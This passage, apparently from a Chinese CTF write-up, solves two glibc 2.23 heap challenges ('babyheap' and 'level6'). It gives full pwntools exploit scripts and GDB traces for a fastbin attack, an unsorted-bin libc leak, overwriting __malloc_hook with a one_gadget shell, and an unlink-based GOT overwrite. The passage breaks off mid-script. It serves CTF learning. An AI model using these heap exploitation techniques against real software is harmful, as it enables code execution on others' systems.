p.recvuntil('Size: ')
p.sendline(str(size))

def fill(idx, size, content):
p.recvuntil('Command: ')
p.sendline('2')
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Size: ')
p.sendline(str(size))
p.recvuntil('Content: ')
p.send(content)

def free(idx):
p.recvuntil('Command: ')
p.sendline('3')
p.recvuntil('Index: ')
p.sendline(str(idx))

def dump(idx):
p.recvuntil('Command: ')
p.sendline('4')
p.recvuntil('Index: ')
p.sendline(str(idx))

查看“数据chunk”的结构:

1
2
3
4
5
allocate(0x20)	# chunk1
allocate(0x20) # chunk2
fill(0,0x8,'aaaaaaaa')
fill(1,0x8,'bbbbbbbb')
free(0)
1
2
3
4
5
6
7
8
9
pwndbg> heap
Free chunk (fastbins) | PREV_INUSE
Addr: 0x55fcbd664000
Size: 0x31
fd: 0x00

Allocated chunk | PREV_INUSE
Addr: 0x55fcbd664030
Size: 0x31
1
2
3
4
pwndbg> telescope 0x55fcbd664000	// chunk1
00:00000x55fcbd664000 ◂— 0x0
01:00080x55fcbd664008 ◂— 0x31 /* '1' */
02:00100x55fcbd664010 ◂— 0x0
1
2
3
4
5
pwndbg> telescope 0x55fcbd664030	// chunk2
00:00000x55fcbd664030 ◂— 0x0
01:00080x55fcbd664038 ◂— 0x31 /* '1' */
02:00100x55fcbd664040 ◂— 'bbbbbbbb'
03:00180x55fcbd664048 ◂— 0x0

可惜程序的“结构chunk”是看不到的:

1643637940828

“&addr[v3]”是由随机数计算得来的,所有的“结构信息”都放入这里

在“malloc模块”中:

1643638199723

这里的“a1”就是“addr”,可见其为一个结构体数组,拥有元素:inuse,size,ptr

在“free模块中”:

1643638538850

程序释放了“addr->ptr”,但是没有置空,所以可以打 UAF & Double free

但是“inuse”被置空,带来了诸多限制

首先程序是可以打Unlink的,不过需要两个关键数据:目标chunk的FD指针,libc基地址

1
2
3
4
5
6
7
8
allocate(0x10) # chunk1
allocate(0x10) # chunk2
allocate(0x10) # chunk3
allocate(0x10) # chunk4
allocate(0x80) # chunk5

free(1) # chunk2
free(2) # chunk3
1
2
3
4
5
6
7
8
9
10
11
pwndbg> x/20xg 0x55e6762a4000
0x55e6762a4000: 0x0000000000000000 0x0000000000000021 # chunk1
0x55e6762a4010: 0x0000000000000000 0x0000000000000000
0x55e6762a4020: 0x0000000000000000 0x0000000000000021 # chunk2(free_1)
0x55e6762a4030: 0x0000000000000000 0x0000000000000000
0x55e6762a4040: 0x0000000000000000 0x0000000000000021 # chunk3(free_2)
0x55e6762a4050: 0x000055e6762a4020 0x0000000000000000
0x55e6762a4060: 0x0000000000000000 0x0000000000000021 # chunk4
0x55e6762a4070: 0x0000000000000000 0x0000000000000000
0x55e6762a4080: 0x0000000000000000 0x0000000000000091 # chunk5
0x55e6762a4090: 0x0000000000000000 0x0000000000000000
1
2
3
pwndbg> bins
fastbins
0x20: 0x55e6762a4040 —▸ 0x55e6762a4020 ◂— 0x0

这里释放了“chunk2”和“chunk3”,可以修改“chunk1”使其溢出到“chunk2,chunk3”,最后覆盖“0x55e6762a4020”(攻击fastbins,获取任意地址写)

1
2
3
4
payload = p64(0)*3+p64(0x21)
payload +=p64(0)*3+p64(0x21)
payload +=p8(0x80)
fill(0,len(payload),payload)
1
2
3
4
5
6
7
8
9
10
11
pwndbg> x/20xg 0x561246beb000
0x561246beb000: 0x0000000000000000 0x0000000000000021 # chunk1(fake)
0x561246beb010: 0x0000000000000000 0x0000000000000000
0x561246beb020: 0x0000000000000000 0x0000000000000021 # chunk2(fake)
0x561246beb030: 0x0000000000000000 0x0000000000000000
0x561246beb040: 0x0000000000000000 0x0000000000000021 # chunk3(fake)
0x561246beb050: 0x0000561246beb080 0x0000000000000000
0x561246beb060: 0x0000000000000000 0x0000000000000021 # chunk4
0x561246beb070: 0x0000000000000000 0x0000000000000000
0x561246beb080: 0x0000000000000000 0x0000000000000091 # chunk5
0x561246beb090: 0x0000000000000000 0x0000000000000000
1
2
3
fastbins
0x20: 0x561246beb040 —▸ 0x561246beb080 ◂— 0x0
# 0x561246beb040(chunk3) -> 0x561246beb080(chunk5)

所以下一次申请“chunk3”,再下一次申请“chunk5”

于是我们提前在“chunk5”中布置好数据:

1
2
payload = p64(0)*3+p64(0x21)
fill(3,len(payload),payload)
1
2
3
4
5
6
7
8
9
10
11
pwndbg> x/20xg 0x5607a32c7000
0x5607a32c7000: 0x0000000000000000 0x0000000000000021 # chunk1(fake)
0x5607a32c7010: 0x0000000000000000 0x0000000000000000
0x5607a32c7020: 0x0000000000000000 0x0000000000000021 # chunk2(free_1_fake)
0x5607a32c7030: 0x0000000000000000 0x0000000000000000
0x5607a32c7040: 0x0000000000000000 0x0000000000000021 # chunk3(free_2_fake)
0x5607a32c7050: 0x00005607a32c7080 0x0000000000000000
0x5607a32c7060: 0x0000000000000000 0x0000000000000021 # chunk4(fake)
0x5607a32c7070: 0x0000000000000000 0x0000000000000000
0x5607a32c7080: 0x0000000000000000 0x0000000000000021 # chunk5(fake)
0x5607a32c7090: 0x0000000000000000 0x0000000000000000
1
2
3
pwndbg> bins
fastbins
0x20: 0x5607a32c7040 —▸ 0x5607a32c7080 ◂— 0x0

把“chunk2”(fake_chunk5)和“chunk3”申请回来,接着进行操作:

1
2
3
4
5
6
7
allocate(0x10) # chunk3
allocate(0x10) # chunk2(fake_chunk5)

fill(1,4,'aaaa') # to chunk2(fake_chunk5)
fill(2,4,'bbbb') # to chunk3
payload = p64(0)*3+p64(0x91)
fill(3,len(payload),payload) # to chunk4 but over chunk5
1
2
3
4
5
6
7
8
9
10
11
pwndbg> x/20xg 0x55cece518000
0x55cece518000: 0x0000000000000000 0x0000000000000021 # chunk1
0x55cece518010: 0x0000000000000000 0x0000000000000000
0x55cece518020: 0x0000000000000000 0x0000000000000021 # chunk2
0x55cece518030: 0x0000000000000000 0x0000000000000000
0x55cece518040: 0x0000000000000000 0x0000000000000021 # chunk3
0x55cece518050: 0x0000000061616161 0x0000000000000000
0x55cece518060: 0x0000000000000000 0x0000000000000021 # chunk4
0x55cece518070: 0x0000000000000000 0x0000000000000000
0x55cece518080: 0x0000000000000000 0x0000000000000091 # chunk5
0x55cece518090: 0x0000000062626262 0x0000000000000000

解释一下:

一,这里申请chunk5的时候,chunk5为“0x91”,需要先覆盖其为“0x21”,然后改回“0x91”

  • 我们需要chunk5为“0x91”,因为其不属于fastbin的范围,可以打 Unsortedbin leak
  • 利用 fastbin attack 已经成功把chunk5放入fastbin,但是不能直接malloc
  • 因为malloc会对 fastbin chunk 的size位进行检查,本程序中,其值必须为“0x21”
  • 成功申请到chunk5后,需要把“0x21”改回“0x91”

二,整个操作就是为了“欺骗”程序:把“chunk5”误认为“chunk3”

  • 本程序是有UAF漏洞的,但是不能直接使用

1643638538850

1643869146462

  • 虽然指针没有置空,但是程序在结构体中定义了“inuse”来记录chunk是否被使用
  • 但是经过上述操作后:用于记录“index”的结构体数组中,chunk3和chunk5指向同一片区域
  • 释放了chunk5,chunk5的“inuse”被设置为“0”,但是chunk3的“inuse”任然为“1”
  • 这下就可以打印chunk3,实现 Unsortedbin leak
1
2
3
4
5
6
dump(2)
p.recvuntil('Content:')
leak_addr=u64(p.recvuntil('\x7f')[2:].ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))
1
2
3
4
5
In [6]: 0x7f1874b00000-0x7f1874ec4b78
Out[6]: -3951480

In [7]: hex(3951480)
Out[7]: '0x3c4b78'

获取了“libc_base”,就可以打“malloc_hook”和“one_gadget”

one_gadget:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL

malloc_hook:

先获取“malloc_hook”的地址:malloc_hook == main_arena - 0x10

1
2
3
4
5
6
pwndbg> x/20xg 0x7f0a01f79ae0
0x7f0a01f79ae0 <_IO_wide_data_0+288>: 0x0000000000000000 0x0000000000000000
0x7f0a01f79af0 <_IO_wide_data_0+304>: 0x00007f0a01f78260 0x0000000000000000
0x7f0a01f79b00 <__memalign_hook>: 0x00007f0a01c3aea0 0x00007f0a01c3aa70
0x7f0a01f79b10 <__malloc_hook>: 0x0000000000000000 0x0000000000000000 // target
0x7f0a01f79b20 <main_arena>: 0x0000000000000000 0x0000000000000000

我们的目标是在“malloc_hook”中写入“one_gadget”,但是不能直接 fastbin attack

​ // 没有对应大小的数据充当“fake_chunk -> size”

这里用了一个小技巧:(拆分现成的地址来构造数据,通常为“\x7f”)

1
2
3
pwndbg> x/20xw 0x7f0a01f79ae0-3
0x7f0a01f79add <_IO_wide_data_0+285>: 0x00000000 0x00000000 0x00000000 0x00000000
0x7f0a01f79aed <_IO_wide_data_0+301>: 0x60000000 0x0a01f782 0x0000007f 0x00000000

通过对目标地址进行“加减1”操作,可以把“\x7f”分离出来,而“0x7f”和“0x70”属于同一个fastbin(统一大小为“0x70”)

接下来就把“0x7f”当做数据就好了:

1
2
3
4
5
6
7
8
In [35]: hex(0x7f0a01f79aed+0x4*2) # addr of fake_chunk->size
Out[35]: '0x7f0a01f79af5'

In [36]: hex(0x7f0a01f79af5-0x8) # addr of fake_chunk->presize(head)
Out[36]: '0x7f0a01f79aed'

In [37]: hex(0x7f0a01f79aed+0x10) # addr of fake_chunk->FD(data)
Out[37]: '0x7f0a01f79afd'
1
2
3
4
5
In [38]: 0x7f0a01f79aed - 0x7f0a01bb5000
Out[38]: 3951341

In [39]: hex(3951341)
Out[39]: '0x3c4aed'

接下来继续进行 fastbin attack,打入“one_gadget”:

1
2
3
4
pwndbg> x/20xg 0x7f0a01f79afd+3 # fake_chunk->FD
0x7f0a01f79b00 <__memalign_hook>: 0x00007f0a01c3aea0 0x00007f0a01c3aa70
0x7f0a01f79b10 <__malloc_hook>: 0x0000000000000000 0x0000000000000000
0x7f0a01f79b20 <main_arena>: 0x0000000000000000 0x0000000000000000
1
2
3
4
5
payload = p8(0)*3
payload += p64(0)*2
payload += p64(libc_base+0x4527a)
fill(6, len(payload),payload)
allocate(255)

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
from pwn import*

p=process('./babyheap')
elf=ELF('./babyheap')
libc=ELF('./libc-2.23.so')

def allocate(size):
p.recvuntil('Command: ')
p.sendline('1')
p.recvuntil('Size: ')
p.sendline(str(size))

def fill(idx, size, content):
p.recvuntil('Command: ')
p.sendline('2')
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Size: ')
p.sendline(str(size))
p.recvuntil('Content: ')
p.send(content)

def free(idx):
p.recvuntil('Command: ')
p.sendline('3')
p.recvuntil('Index: ')
p.sendline(str(idx))

def dump(idx):
p.recvuntil('Command: ')
p.sendline('4')
p.recvuntil('Index: ')
p.sendline(str(idx))

#gdb.attach(p)

allocate(0x10)
allocate(0x10)
allocate(0x10)
allocate(0x10)
allocate(0x80)

free(1)
free(2)

payload = p64(0)*3+p64(0x21)
payload +=p64(0)*3+p64(0x21)
payload +=p8(0x80)
fill(0,len(payload),payload)
payload = p64(0)*3+p64(0x21)
fill(3,len(payload),payload)

allocate(0x10)
allocate(0x10)

fill(1,4,'aaaa')
fill(2,4,'bbbb')
payload = p64(0)*3+p64(0x91)
fill(3,len(payload),payload)
allocate(0x80)
free(4)

dump(2)
p.recvuntil('Content:')
leak_addr=u64(p.recvuntil('\x7f')[2:].ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

allocate(0x60)
free(4)
payload = p64(libc_base+0x3c4aed)
fill(2, len(payload),payload)

allocate(0x60)
allocate(0x60)

payload = p8(0)*3
payload += p64(0)*2
payload += p64(libc_base+0x4527a)
fill(6, len(payload),payload)
allocate(255)

#pause()

p.interactive()

这道题目加深了我对Unlink攻击的理解,也学习到了Unsortedbin的知识

这种“FD&BK”遗留heap中,覆写一半泄露一半的模式应该会很常见

level6

1643275729514

1643275751088

1643275759522

64位,dynamically,开了NX,开了canary

1643275717246

程序有6个功能,先搭好框架:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
def print_s():
p.recvuntil('Your choice: ')
p.sendline(str(1))

def malloc_s(size,note):
p.recvuntil('Your choice: ')
p.sendline(str(2))
p.sendlineafter('Length of new note: ',str(size))
p.sendafter('Enter your note: ',note)

def edit_s(index,size,note):
p.recvuntil('Your choice: ')
p.sendline(str(3))
p.sendlineafter('Note number: ',str(index))
p.sendlineafter('Length of note: ',str(size))
p.sendafter('Enter your note: ',note)

def free_s(index):
p.recvuntil('Your choice: ')
p.sendline(str(4))
p.sendlineafter('Note number: ',str(index))

入侵思路

1643280646235

“free模块”置空了指针,没有UAF漏洞,但是它只“free”了结构chunk,数据chunk留存出heap中

程序有明显的堆溢出,可以打unlink攻击

先在GDB中分析“结构chunk”和“数据chunk”:

1
2
3
4
5
malloc_s(0x80,'a'*0x80)
malloc_s(0x80,'b'*0x80)
malloc_s(0x80,'c'*0x80)
pause()
free_s(0)
1
2
3
4
pwndbg> x/20xg 0x6020A8
0x6020a8: 0x00000000021872a0 0x0000000000000000
0x6020b8: 0x0000000000000000 0x0000000000000000
0x6020c8: 0x0000000000000000 0x0000000000000000
1
2
3
4
5
6
7
8
pwndbg> x/60xg 0x00000000021872a0
0x21872a0: 0x0000000000000100 0x0000000000000003
0x21872b0: 0x0000000000000001 0x0000000000000080
0x21872c0: 0x0000000002188ac0 0x0000000000000001
0x21872d0: 0x0000000000000080 0x0000000002188b50
0x21872e0: 0x0000000000000001 0x0000000000000080
0x21872f0: 0x0000000002188be0 0x0000000000000000
0x2187300: 0x0000000000000000 0x0000000000000000

执行“free_s(0)”前:

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> telescope 0x00000000021872a0
00:00000x21872a0 ◂— 0x100
01:00080x21872a8 ◂— 0x3 //allocate chunk的总数
02:00100x21872b0 ◂— 0x1 //chunk1_P位
03:00180x21872b8 ◂— 0x80 //chunk1_size
04:00200x21872c0 —▸ 0x2188ac0 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
05:00280x21872c8 ◂— 0x1 //chunk2_P位
06:00300x21872d0 ◂— 0x80 //chunk2_size
07:00380x21872d8 —▸ 0x2188b50 ◂— 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
08:00400x21872e0 ◂— 0x1 //chunk3_P位
09:00480x21872e8 ◂— 0x80 //chunk3_size
0a:00500x21872f0 —▸ 0x2188be0 ◂— 'cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc'
0b:00580x21872f8 ◂— 0x0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
pwndbg> x/200xg 0x2188ab0
0x2188ab0: 0x0000000000000000 0x0000000000000091 # chunk1
0x2188ac0: 0x6161616161616161 0x6161616161616161
0x2188ad0: 0x6161616161616161 0x6161616161616161
0x2188ae0: 0x6161616161616161 0x6161616161616161
0x2188af0: 0x6161616161616161 0x6161616161616161
0x2188b00: 0x6161616161616161 0x6161616161616161
0x2188b10: 0x6161616161616161 0x6161616161616161
0x2188b20: 0x6161616161616161 0x6161616161616161
0x2188b30: 0x6161616161616161 0x6161616161616161
0x2188b40: 0x0000000000000000 0x0000000000000091 # chunk2
0x2188b50: 0x6262626262626262 0x6262626262626262
0x2188b60: 0x6262626262626262 0x6262626262626262
0x2188b70: 0x6262626262626262 0x6262626262626262
0x2188b80: 0x6262626262626262 0x6262626262626262
0x2188b90: 0x6262626262626262 0x6262626262626262
0x2188ba0: 0x6262626262626262 0x6262626262626262
0x2188bb0: 0x6262626262626262 0x6262626262626262
0x2188bc0: 0x6262626262626262 0x6262626262626262
0x2188bd0: 0x0000000000000000 0x0000000000000091 # chunk3
0x2188be0: 0x6363636363636363 0x6363636363636363
0x2188bf0: 0x6363636363636363 0x6363636363636363
0x2188c00: 0x6363636363636363 0x6363636363636363
0x2188c10: 0x6363636363636363 0x6363636363636363
0x2188c20: 0x6363636363636363 0x6363636363636363
0x2188c30: 0x6363636363636363 0x6363636363636363
0x2188c40: 0x6363636363636363 0x6363636363636363
0x2188c50: 0x6363636363636363 0x6363636363636363
0x2188c60: 0x0000000000000000 0x000000000001f3a1

执行“free_s(0)”后:

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> telescope 0x0000000001aed010
00:00000x1aed010 ◂— 0x100
01:00080x1aed018 ◂— 0x2
02:00100x1aed020 ◂— 0x0
03:00180x1aed028 ◂— 0x0
04:00200x1aed030 —▸ 0x1aee830 —▸ 0x7fc081570b78 (main_arena+88) —▸ 0x1aee9d0 ◂— 0x0
05:00280x1aed038 ◂— 0x1
06:00300x1aed040 ◂— 0x80
07:00380x1aed048 —▸ 0x1aee8c0 ◂— 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
08:00400x1aed050 ◂— 0x1
09:00480x1aed058 ◂— 0x80
0a:00500x1aed060 —▸ 0x1aee950 ◂— 'cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc'
0b:00580x1aed068 ◂— 0x0

可以发现:原本“chunk1”的数据区被写入了“main_arena+88”(因为这是unsortedbin的特性)

1
2
unsortedbin
all: 0x114d820 —▸ 0x7fb1a8b49b78 (main_arena+88) ◂— 0x114d820

PS:只有低libc版本的程序才有这个特性

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> telescope 0x00000000019c12a0
00:00000x19c12a0 ◂— 0x100
01:00080x19c12a8 ◂— 0x2
02:00100x19c12b0 ◂— 0x0
03:00180x19c12b8 ◂— 0x0
04:00200x19c12c0 —▸ 0x19c2ac0 ◂— 0x0 // 高libc版本的这个位置为“null”
05:00280x19c12c8 ◂— 0x1
06:00300x19c12d0 ◂— 0x80
07:00380x19c12d8 —▸ 0x19c2b50 ◂— 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
08:00400x19c12e0 ◂— 0x1
09:00480x19c12e8 ◂— 0x80
0a:00500x19c12f0 —▸ 0x19c2be0 ◂— 'cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc'
0b:00580x19c12f8 ◂— 0x0

可以利用这个特性来泄露“libc_base”(main_arena的偏移可以在GDB中计算)

为了打Unlink攻击,还需要泄露“list_addr_chunk1”,chunk1的FD指针(这里攻击chunk1)

这时我们这样构造payload,以同时泄露“list_addr_chunk1”和“libc_base”

1
2
3
4
5
6
7
8
9
malloc_s(0x80,'a'*0x80)
malloc_s(0x80,'b'*0x80)
malloc_s(0x80,'c'*0x80)
malloc_s(0x80,'d'*0x80)
free_s(0)
free_s(2)
pause()
malloc_s(8,'yyyyyyyy')
malloc_s(8,'xxxxxxxx')

执行“free_s”后,执行“malloc_s”前:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> telescope 0x0000000000d30010
00:00000xd30010 ◂— 0x100
01:00080xd30018 ◂— 0x2
02:00100xd30020 ◂— 0x0
03:00180xd30028 ◂— 0x0
04:00200xd30030 —▸ 0xd31830 —▸ 0x7fde89390b78 (main_arena+88) —▸ 0xd31a60 ◂— 0x0
05:00280xd30038 ◂— 0x1 // shunk2_presize
06:00300xd30040 ◂— 0x80 // shunk2_size
07:00380xd30048 —▸ 0xd318c0 ◂— 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
08:00400xd30050 ◂— 0x0
09:00480xd30058 ◂— 0x0
0a:00500xd30060 —▸ 0xd31950 —▸ 0xd31820 ◂— 0x0
0b:00580xd30068 ◂— 0x1
0c:00600xd30070 ◂— 0x80
0d:00680xd30078 —▸ 0xd319e0 ◂— 'dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd'
0e:00700xd30080 ◂— 0x0

可以发现:我们想要的两个地址已经在unsortedbin中了:

1
2
unsortedbin
all: 0xd31940 —▸ 0xd31820 —▸ 0x7fde89390b78 (main_arena+88) ◂— 0xd31940
1
2
3
4
5
pwndbg> x/30xg 0xd31940
0xd31940: 0x0000000000000000 0x0000000000000091 # chunk3
0xd31950: 0x0000000000d31820 0x00007fde89390b78
0xd31960: 0x6363636363636363 0x6363636363636363
0xd31970: 0x6363636363636363 0x6363636363636363
1
2
3
4
5
pwndbg> x/30xg 0xd31820
0xd31820: 0x0000000000000000 0x0000000000000091 # chunk1
0xd31830: 0x00007fde89390b78 0x0000000000d31940
0xd31840: 0x6161616161616161 0x6161616161616161
0xd31850: 0x6161616161616161 0x6161616161616161

执行“malloc_s”后:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> telescope 0x0000000000d30010
00:00000xd30010 ◂— 0x100
01:00080xd30018 ◂— 0x4
02:00100xd30020 ◂— 0x1
03:00180xd30028 ◂— 0x8
04:00200xd30030 —▸ 0xd31830 ◂— 0x7979797979797979 ('yyyyyyyy') // chunk1_FD
05:00280xd30038 ◂— 0x1
06:00300xd30040 ◂— 0x80
07:00380xd30048 —▸ 0xd318c0 ◂— 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
08:00400xd30050 ◂— 0x1
09:00480xd30058 ◂— 0x8
0a:00500xd30060 —▸ 0xd31950 ◂— 0x7878787878787878 ('xxxxxxxx')
0b:00580xd30068 ◂— 0x1
0c:00600xd30070 ◂— 0x80
0d:00680xd30078 —▸ 0xd319e0 ◂— 'dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd'
0e:00700xd30080 ◂— 0x0

由于只写入了“8字节”的数据,所以unsortedbin只被覆盖了FD指针,BK指针的数据得以保留

1
2
3
4
5
pwndbg> x/30xg 0xd31940
0xd31940: 0x0000000000000000 0x0000000000000091 # chunk3
0xd31950: 0x7878787878787878 0x00007fde89390b78
0xd31960: 0x6363636363636363 0x6363636363636363
0xd31970: 0x6363636363636363 0x6363636363636363
1
2
3
4
5
pwndbg> x/30xg 0xd31820
0xd31820: 0x0000000000000000 0x0000000000000091 # chunk1
0xd31830: 0x7979797979797979 0x0000000000d31940
0xd31840: 0x6161616161616161 0x6161616161616161
0xd31850: 0x6161616161616161 0x6161616161616161

unsortedbin特点:

  • 由free chunks组成的循环双链表

  • 第一个chunk的BK指向“main_arena+xx”,最后一个chunk的FD指向“main_arena+xx”

    ​ // 在高libc版本中:这个特性被移除(指向“null”)

进行数据接收与计算:

“libc_base”:

1
2
3
4
      0xd30000           0xd52000 rw-p    22000 0      [heap]
0x7fde88fcc000 0x7fde8918c000 r-xp 1c0000 0 /home/ywhkkx/tool/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
0x7fde8918c000 0x7fde8938c000 ---p 200000 1c0000 /home/ywhkkx/tool/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
0x7fde8938c000 0x7fde89390000 r--p 4000 1c0000 /home/ywhkkx/tool/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so
1
2
3
4
5
In [26]: 0x00007fde89390b78-0x7fde88fcc000
Out[26]: 3951480

In [27]: hex(3951480)
Out[27]: '0x3c4b78'

“list_addr_chunk1”(chunk1的FD指针):

1
2
3
4
5
In [41]: 0x0000000000d31940-0xd30030
Out[41]: 6416

In [42]: hex(6416)
Out[42]: '0x1910'

接下来就可以打Unlink了:

1
2
3
4
5
6
7
8
9
10
payload=p64(0x0)+p64(0x80)
payload+=p64(list_addr_chunk1-0x18)+p64(list_addr_chunk1-0x10)#fake_chunk
payload=payload.ljust(0x80,'a')
payload+=p64(0x80)+p64(0x90)#fake_chunk2_size
payload+='a'*0x80
payload+=p64(0x90)+p64(0x121)#fake_chunk3_size
edit_s(0,len(payload),payload)
free_s(1)#释放chunk2
#伪造chunk2_presize为:0x90(填满chunk1,chunk2,P位为'0')
#伪造chunk3_presize为:0x121(填满chunk1,chunk2,P位为'1')
  • 设置chunk3为allocate chunk,放置其与chunk2合并
  • 原本chunk3为free状态,必须伪造
  • 伪造chunk3的presize为合并后的chunk大小(包括chunk1的“size”和“pre_size”)

执行后:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> telescope 0x0000000002194010
00:00000x2194010 ◂— 0x100
01:00080x2194018 ◂— 0x0
02:00100x2194020 ◂— 0x1
03:00180x2194028 ◂— 0x120
04:00200x2194030 —▸ 0x2194018 ◂— 0x0 // 指向list_addr_chunk1-0x18
05:00280x2194038 ◂— 0x0
06:00300x2194040 ◂— 0x0
07:00380x2194048 —▸ 0x21958c0 ◂— 0x6161616161616161 ('aaaaaaaa')
08:00400x2194050 ◂— 0x0
09:00480x2194058 ◂— 0x0
0a:00500x2194060 —▸ 0x2195950 ◂— 0x7878787878787878 ('xxxxxxxx')
0b:00580x2194068 ◂— 0x0
0c:00600x2194070 ◂— 0x0
0d:00680x2194078 —▸ 0x21959e0 ◂— 'dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd'
0e:00700x2194080 ◂— 0x0

接下来就可以模仿“结构chunk”,伪造需要的chunk了:

1
2
3
4
5
6
7
free_got=elf.got['free']
payload =p64(4)+p64(1)+p64(0x8)+p64(free_got)
payload +=p64(1)+p64(0x8)+p64(leak_addr)
payload +=p64(1)+p64(0x8)+p64(elf.got['atoi'])
payload = payload.ljust(0x120,'\x00')
edit_s(0,len(payload),payload)
#payload将填满chunk1,chunk2

执行后:

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> telescope 0x0000000000914010
00:00000x914010 ◂— 0x100
01:00080x914018 ◂— 0x4 // fake_start
02:00100x914020 ◂— 0x1
03:00180x914028 ◂— 0x8
04:00200x914030 —▸ 0x602018 (free@got.plt) —▸ 0x7f8b519da540 (free) ◂— push r13
05:00280x914038 ◂— 0x1
06:00300x914040 ◂— 0x8
07:00380x914048 —▸ 0x7f8b51d1ab78 (main_arena+88) —▸ 0x9159b0 ◂— 0x6363636363636363 ('cccccccc')
08:00400x914050 ◂— 0x1
09:00480x914058 ◂— 0x8
0a:00500x914060 —▸ 0x602070 (atoi@got.plt) —▸ 0x7f8b5198ce90 (atoi) ◂— sub rsp, 8
0b:00580x914068 ◂— 0x0

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from pwn import*

p=process('./level6')
elf=ELF('./level6')
libc=ELF('./libc-2.23.so')

atoi_got=elf.got['atoi']
success('atoi_got >> '+hex(atoi_got))

#gdb.attach(p)

def print_s():
p.recvuntil('Your choice: ')
p.sendline(str(1))

def malloc_s(size,note):
p.recvuntil('Your choice: ')
p.sendline(str(2))
p.sendlineafter('Length of new note: ',str(size))
p.sendafter('Enter your note: ',note)

def edit_s(index,size,note):
p.recvuntil('Your choice: ')
p.sendline(str(3))
p.sendlineafter('Note number: ',str(index))
p.sendlineafter('Length of note: ',str(size))
p.sendafter('Enter your note: ',note)

def free_s(index):
p.recvuntil('Your choice: ')
p.sendline(str(4))
p.sendlineafter('Note number: ',str(index))

list_addr=0x6020A8+0x10

malloc_s(0x80,'a'*0x80)
malloc_s(0x80,'b'*0x80)
malloc_s(0x80,'c'*0x80)
malloc_s(0x80,'d'*0x80)
free_s(0)
free_s(2)
malloc_s(8,'yyyyyyyy')
malloc_s(8,'xxxxxxxx')

print_s()

p.recvuntil('y'*8)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
success('leak_addr >> '+hex(leak_addr))
